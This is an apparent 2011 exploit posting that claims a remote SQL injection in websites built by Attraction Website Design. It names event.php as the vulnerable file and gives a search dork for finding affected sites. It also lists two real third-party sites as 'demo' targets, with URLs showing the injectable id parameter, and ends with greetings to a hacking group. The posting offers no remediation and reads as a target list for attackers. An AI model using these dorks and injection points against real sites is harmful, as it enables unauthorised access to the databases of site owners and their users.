Attraction Website Design suffers from a remote SQL injection vulnerability.
79658c1b0fc744ec3f36cd374c416e33f335b009a501b64e5833c451bf8f8a09
# Exploit Title: Attraction Website Design Sql Injection Vulnerability
# Date: 30/10/2011 - 22:45
# Author: 3spi0n
# Software Website: http://www.attractweb.com/index.php
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File: Event.php and other .php files.
[$] Dorks: "Site by Attraction Website Design"
[$] Demo Sites:
[~] http://www.runningmyraces.com/event.php?id=1870" [PhpSQLi]
[~] http://www.livingthegoodnews.runningmyraces.com/event.php?id=3344"
[PhpSQLi]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Http://3spi0n.Net/
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>